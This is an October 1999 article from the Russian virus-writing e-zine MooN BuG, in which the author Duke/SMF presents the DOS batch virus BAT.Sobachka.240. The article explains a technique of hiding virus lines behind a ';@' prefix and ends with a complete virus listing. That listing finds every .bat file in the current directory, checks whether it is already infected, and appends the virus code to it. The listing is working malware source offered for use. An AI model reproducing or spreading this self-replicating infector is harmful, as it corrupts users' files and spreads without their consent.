╔════════╤════════════════════════════════════════════════════╤══════════╤═══╗
║Okt 1999│NF представляет электронный журнал MooN BuG issue 11│ Duke/SMF │010║
╟────────┴────────────────────────────────────────────────────┴──────────┴───╢
║                           Вирус BAT.Sobachka.240                           ║
╚════════════════════════════════════════════════════════════════════════════╝

BAT.Sobachka.240
(c) by Duke/SMF

     Этот  BAT вирус ни чем не выделяется среди сотен других своих сородичей -
поражает  все  батники текущего каталога, проверяет на зараженность, не делает
попыток размножаться из AUTOEXEC.BAT, не выводит сообщений на экран...
     Но  есть  у  него  одна  изюминка.  Точнее  изюмина.  В процессе создания
эвристического   анализатора   BAT-вирусов  я  открыл  ;)  недокументированную
особенность Batch языка - команды (стоящие в начале строки) могут начинаться с
символа   ";",   и   это   не   будет   мешать   работоспособности  BAT-файла.
Наличие/отсутствие ";" никак не отражается на выполнении команды в частности и
всего  файла  в  целом.  Символ ";" в начале любой строки (даже перед меткой!)
игнорируется DOS'ом !!!
     Поскольку  символ  "@"  стоящий  в  начале строки символизирует локальное
"echo  off",  то  в  нашем  распоряжении  имеется  целая метка для определения
пораженности  файла  и размножения с использованием утилиты FIND (надеюсь, что
Reminder сейчас икает... ;-))) Для этого достаточно написать вирус в виде

;@команда1
;@команда2
..........
;@командаX

     Однако,  иногда  встречаются  метки  безусловного  перехода.  Они  должны
начинаться  с  символа ":". Если описать метку как ";@:метка", то ничего у нас
работать  не  будет  -  DOS  не  найдет  метку. Но ничто не мешает нам взять в
качестве  имени  метки  строку,  начинающуюся  на  ";@".  Да,  такое имя метки
позволительно в Batch языке.
     Вот  на  этим открытиях и построен вирус Sobachka. Если у вас есть другие
оригинальные   предложения   -  милости  просим.  Все  комментарии  мыльте  на
smf2000@mail.ru

===== Cut Here =====
;@ctty nul
;@if "%0==" goto ;@
;@if "%1=="@ goto ;@z
;@echo.>@.bat
;@find ";@"<%0>>@.bat
;@for %%b in (*.bat) do call @ @ %%b
;@del @.*
;@goto ;@
:;@z [Sobachka] by Duke/SMF
;@find ";@"<%2
;@if errorlevel 1 type @.bat>>%2
:;@
===== Cut here =====
